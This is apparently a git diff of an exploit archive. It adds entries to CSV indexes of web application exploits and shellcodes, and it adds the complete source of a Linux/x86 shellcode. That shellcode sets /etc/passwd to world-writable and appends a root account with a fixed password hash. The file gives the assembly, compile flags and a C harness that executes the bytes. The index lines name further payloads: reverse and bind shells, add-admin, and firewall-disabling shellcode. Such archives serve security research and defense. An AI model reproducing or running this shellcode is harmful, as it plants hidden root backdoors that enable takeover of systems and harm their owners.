48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java, 48022,exploits/php/webapps/48022.txt,"QuickDate 1.3.2 - SQL Injection",2020-02-07,"Ihsan Sencan",webapps,php, +48023,exploits/php/webapps/48023.txt,"VehicleWorkshop 1.0 - 'bookingid' SQL Injection",2020-02-07,"Mehran Feizi",webapps,php, 48024,exploits/php/webapps/48024.txt,"PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection",2020-02-07,"Amel BOUZIANE-LEBLOND",webapps,php, 48025,exploits/php/webapps/48025.txt,"EyesOfNetwork 5.3 - Remote Code Execution",2020-02-07,"Clément Billac",webapps,php, 48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml, @@ -42526,16 +42556,23 @@ id,file,description,date,author,type,platform,port 48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi, 48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php, 48047,exploits/php/webapps/48047.rb,"WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80 +48058,exploits/php/webapps/48058.txt,"WordPress Plugin Tutor.1.5.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php, +48059,exploits/php/webapps/48059.txt,"WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting",2020-02-13,"Mehran Feizi",webapps,php, +48061,exploits/php/webapps/48061.txt,"WordPress Plugin Wordfence.7.4.5 - Local File Disclosure",2020-02-13,"Mehran Feizi",webapps,php, +48062,exploits/php/webapps/48062.txt,"WordPress Plugin contact-form-7 5.1.6 - Remote File Upload",2020-02-13,"Mehran Feizi",webapps,php, 48066,exploits/php/webapps/48066.txt,"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection",2020-02-14,J3rryBl4nks,webapps,php, 48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php, +48065,exploits/php/webapps/48065.txt,"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php, 48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php, 48076,exploits/php/webapps/48076.txt,"WordPress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php, 48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware, 48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php, 48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ultra Security Team",webapps,php, 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php, +48088,exploits/php/webapps/48088.txt,"WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting",2020-02-17,Shahab.ra.9,webapps,php, 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php, 48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java, +48093,exploits/php/webapps/48093.txt,"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting",2020-02-18,"Ultra Security Team",webapps,php, 48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php, 48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware, 48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware, @@ -42585,6 +42622,9 @@ id,file,description,date,author,type,platform,port 48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php, 48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php, 48197,exploits/php/webapps/48197.txt,"WordPress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php, +48198,exploits/php/webapps/48198.txt,"Joomla! 3.9.0 < 3.9.7 - CSV Injection",2020-03-11,i4bdullah,webapps,php, +48199,exploits/php/webapps/48199.txt,"PlaySMS 1.4.3 - Template Injection / Remote Code Execution",2020-03-11,"Touhid M.Shaikh",webapps,php, +48200,exploits/php/webapps/48200.txt,"Wing FTP Server - Authenticated CSRF (Delete Admin)",2020-03-11,"Dhiraj Mishra",webapps,php, 48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php, 48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java, 48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php, @@ -42594,14 +42634,18 @@ id,file,description,date,author,type,platform,port 48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php, 48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php, 48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux, +48213,exploits/php/webapps/48213.txt,"WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification",2020-03-13,"Nawaf Alkeraithe",webapps,php, 48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php, 48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp, 48218,exploits/php/webapps/48218.txt,"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection",2020-03-16,"AYADI Mohamed",webapps,php, 48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php, 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php, 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php, +48222,exploits/php/webapps/48222.txt,"UADMIN Botnet 1.0 - 'link' SQL Injection",2020-03-17,n4pst3r,webapps,php, 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware, +48230,exploits/php/webapps/48230.txt,"Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload",2020-03-18,qw3rTyTy,webapps,php, 48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php, +48238,exploits/php/webapps/48238.txt,"Wordpress Plugin PicUploader 1.0 - Remote File Upload",2020-03-23,"Milad karimi",webapps,php, 48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple, 48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php, 48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php, @@ -42618,6 +42662,7 @@ id,file,description,date,author,type,platform,port 48266,exploits/cgi/webapps/48266.py,"Zen Load Balancer 3.10.1 - Remote Code Execution",2020-03-30,"Cody Sixteen",webapps,cgi, 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, +48278,exploits/php/webapps/48278.txt,"PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution",2020-04-02,Unkn0wn,webapps,php, 48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php, 48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php, 48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple, @@ -42626,6 +42671,7 @@ id,file,description,date,author,type,platform,port 48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php, 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd, 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php, +48307,exploits/php/webapps/48307.txt,"WordPress Plugin Helpful 2.4.11 - SQL Injection",2020-04-10,"numan türle",webapps,php, 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi, 48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware, 48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware, @@ -42647,7 +42693,9 @@ id,file,description,date,author,type,platform,port 48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios, 48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php, 48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php, +48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php, 48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php, +48349,exploits/php/webapps/48349.py,"WordPress Plugin Simple File List 5.4 - Remote Code Execution",2020-04-20,coiffeur,webapps,php, 48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php, 48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php, 48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php, @@ -42663,6 +42711,7 @@ id,file,description,date,author,type,platform,port 48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php, 48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php, 48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi, +48374,exploits/php/webapps/48374.txt,"Library CMS Powerful Book Management System 2.2.0 - Session Fixation",2020-04-23,"Ismail Tasdelen",webapps,php, 48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios, 48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple, 48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware, @@ -42805,7 +42854,7 @@ id,file,description,date,author,type,platform,port 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php, -48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, +48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection",2020-06-10,"Mehmet Kelepçe",webapps,php, 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php, 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple, 48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple, @@ -42814,3 +42863,4 @@ id,file,description,date,author,type,platform,port 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php, 48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php, 48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple, +48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 4df2da0ca..5b4a7b3f8 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1004,6 +1004,7 @@ id,file,description,date,author,type,platform 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm +47481,shellcodes/linux/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux 47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux 47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux 47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux @@ -1018,8 +1019,8 @@ id,file,description,date,author,type,platform 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux -48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 +48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows -48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux +48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux 48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm diff --git a/shellcodes/linux/47481.c b/shellcodes/linux/47481.c new file mode 100644 index 000000000..b240a8e6a --- /dev/null +++ b/shellcodes/linux/47481.c @@ -0,0 +1,105 @@ +# Exploit Title: Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) +# Date: 2019-10-05 +# Exploit Author: sagar.offsec (VL43CK) +# Guided by: Touhid M.Shaikh +# Designation: Security Consultant at SecureLayer7 +# Website: https://www.sagaroffsec.com +# Tested on: Ubuntu i386 GNU/LINUX +# Shellcode Length: 59 + +----------------------(DESCRIPTION)---------------------------- + +This shellcode will first change /etc/passwd permission to 777 and then +add a user "vl43ck" in it with password "test" with root permissions. + +----------------------(SHELLCODE DUMP)------------------------- +global _start + +section .text +_start: + + ;chmod 777 /etc/passwd + + xor eax, eax + push eax + + push 0x64777373 + push 0x61702f63 + push 0x74652f2f + xor ebx, ebp + lea ebx, [esp] + + xor ecx, ecx + mov cx, 0x1ff + + mov al, 0xf + int 0x80 + + ;add user in /etc/passwd + + ;open /etc/passwd + + xor eax, eax + mov al, 5 + xor ecx, ecx + mov cx, 2001Q + int 0x80 + + ;write into /etc/passwd + + xor ebx, ebx + mov ebx, eax + + jmp short call_write +write: + pop ecx + + xor eax, eax + xor edx, edx + mov dx, 132 + mov al, 4 + int 0x80 + + ; close /etc/passwd + + xor eax, eax + mov al, 6 + int 0x80 + + ;exit gracefully + + push eax + xor eax, eax + mov al, 1 + xor ebx, ebx + pop ebx + int 0x80 + +call_write: + + call write + shellcode: db "vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash" + + +----------------------(COMPILE)------------------------- + +gcc -m32 -fno-stack-protector -z execstack -o shellcode shellcode.c + +----------------------(C-Code)-------------------------- + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x31\xeb\x8d\x1c\x24\x31\xc9\x66\xb9\xff\x01\xb0\x0f\xcd\x80\x31\xc0\xb0\x05\x31\xc9\x66\xb9\x01\x04\xcd\x80\x31\xdb\x89\xc3\xeb\x1d\x59\x31\xc0\x31\xd2\x66\xba\x84\x00\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x50\x31\xc0\xb0\x01\x31\xdb\x5b\xcd\x80\xe8\xde\xff\xff\xff\x76\x6c\x34\x33\x63\x6b\x3a\x24\x36\x24\x62\x78\x77\x4a\x66\x7a\x6f\x72\x24\x4d\x55\x68\x55\x57\x4f\x30\x4d\x55\x67\x64\x6b\x57\x66\x50\x50\x45\x79\x64\x71\x67\x5a\x70\x6d\x2e\x59\x74\x50\x4d\x49\x2f\x67\x61\x4d\x34\x6c\x56\x71\x68\x50\x32\x31\x4c\x46\x4e\x57\x6d\x53\x4a\x38\x32\x31\x6b\x76\x4a\x6e\x49\x79\x6f\x4f\x44\x59\x74\x42\x68\x2e\x53\x46\x39\x61\x52\x37\x63\x69\x51\x42\x52\x43\x63\x77\x35\x62\x67\x6a\x58\x30\x3a\x30\x3a\x30\x3a\x76\x6c\x34\x33\x63\x6b\x3a\x2f\x74\x6d\x70\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file